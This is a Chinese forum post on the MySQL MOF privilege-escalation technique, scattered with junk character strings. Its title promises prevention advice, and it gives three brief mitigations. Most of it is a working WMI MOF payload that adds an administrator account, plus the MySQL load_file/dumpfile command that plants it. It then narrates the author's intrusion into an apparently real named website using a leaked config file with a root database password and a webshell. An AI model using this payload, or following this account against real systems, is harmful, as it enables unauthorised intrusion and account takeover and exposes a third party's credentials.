Mysql mof扩展漏洞防范方法, o/ S2 T f7 t; c6 k- U
* M! y4 x: o% u9 c网上公开的一些利用代码:! n4 ^& l% S! j: F% k/ k5 J
, n3 j- x! ^8 ]6 r: h! \+ x#pragma namespace(“\\\\.\\root\\subscription”)" ~4 U1 z$ A' s9 L/ ]* F t
% j# a( \7 X; N7 t) ]9 A1 W+ Q+ Dinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };& O+ o* E1 s" _
+ ^/ f% M2 D/ s+ ^% |* x
( A2 e; |' Y# y; t
* K& d+ n7 I, A' b9 r3 @
2 C- F8 y- G4 N( B3 l
3 G* B& o4 B6 ?4 j8 D7 ?0 n7 D: E连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;% Z& c/ K5 o( q3 \
从上面代码来看得出解决办法:& L s* S2 _( k2 ]
% h. m! L9 s1 `5 \' E( ?; E1 G) I
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数2 `# H- S | q
- t4 W& d/ P/ e0 l- {2、禁止使用”WScript.Shel”组件
' F- M9 u% l' G* B5 ^8 m1 ?( R+ o4 ^, J
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
/ p& B" \+ Y' n3 K; m" c
. K$ ?0 |' R! z3 q; J7 d当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
1 H& A3 v8 f! _5 A6 M
- e; [- f9 j6 e2 a事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权8 R. {* l& Y/ O3 @+ y7 Q
& W- Z$ ]* S! l# z但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容2 r0 s$ |; G6 x* G" D2 ^$ N
3 v/ S7 N5 l. \+ G n看懂了后就开始练手吧: P. U- X2 q# V6 e& `. D, _' L
& n; p6 @' ?1 X& xhttp://www.webbmw.com/config/config_ucenter.php 一句话 a" m7 r4 X7 s& I3 \* y; E
" U1 x& l L- E9 u: `1 }
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。6 Y9 Z2 o% } c( Q6 h
; J2 v# w% }( g% q于是直接用菜刀开搞7 l! |; C$ q1 C6 C/ h7 _
( g5 j( X3 \5 `3 [# }上马先, o: t% G0 e% `6 r7 K
. _ k" {1 t L7 F% V2 [4 T既然有了那些账号 之类的 于是我们就执行吧…….: y/ m) P) G- _% f" d
3 z* s) R3 x- S0 y5 D小小的说下* g7 z3 U* `& c% C a$ w9 W1 W* {
5 O5 B% G$ N5 F* a, ^* t. l在这里第1次执行未成功 原因未知
/ O, ^5 I: i1 ?$ Y) Z, t9 e( B+ p4 ]! {6 H& j2 T
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
% ~* O0 @6 u" x, } i2 n5 D' j2 J( K" ]$ \
#pragma namespace(“\\\\.\\root\\subscription”)6 k$ ?1 B: O; R6 Z7 [0 }
7 M/ u8 f: c- {% x/ Finstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
# X: T) R$ n, o) h6 A4 [. @6 n+ p n3 K9 g
我是将文件放到C:\WINDOWS\temp\1.mof
8 U6 k$ B/ t5 F- J0 R( E3 A, e! e: j
所以我们就改下执行的代码7 N6 b. r7 Q6 U& w* H4 ^6 b3 K
4 l, ]6 S6 K* I* v0 B# r$ Q; v/ Mselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
, d/ D, M0 D6 b2 X
8 ~4 e+ u- Q6 o
- {0 o% h- m( ?4 o# P6 N, g4 E# t; |: d& V9 j8 H' d
但是 你会发现账号还是没有躺在那里。。
7 |7 w- E# j" ?/ _4 X" |2 j8 P+ F6 h d1 N9 W+ ^0 W0 C
于是我就感觉蛋疼
9 U2 C3 {$ I% e2 M/ U+ `) w& t% ?( H% @$ U$ {3 \
就去一个一个去执行 但是执行到第2个 mysql时就成功了………% ]9 K# L& W3 y
4 G; m" m$ F1 b+ w% u
% K3 r2 N) y" G# F! @) ^2 C6 t. U! \+ X( _0 \' m
但是其他库均不成功…
9 {. B5 B, [% q |; I; J7 ]& v- @9 F& s2 Q5 U/ t9 U
我就很费解呀 到底为什么不成功求大牛解答…
5 P6 z" l" J2 ?! ?9 D. `$ e+ h% c* i% i; ?5 q, @
; e; U+ Z( }8 @
& m: w) k' b9 X |
发表于 2013-1-4 19:49:49
收藏
支持
反对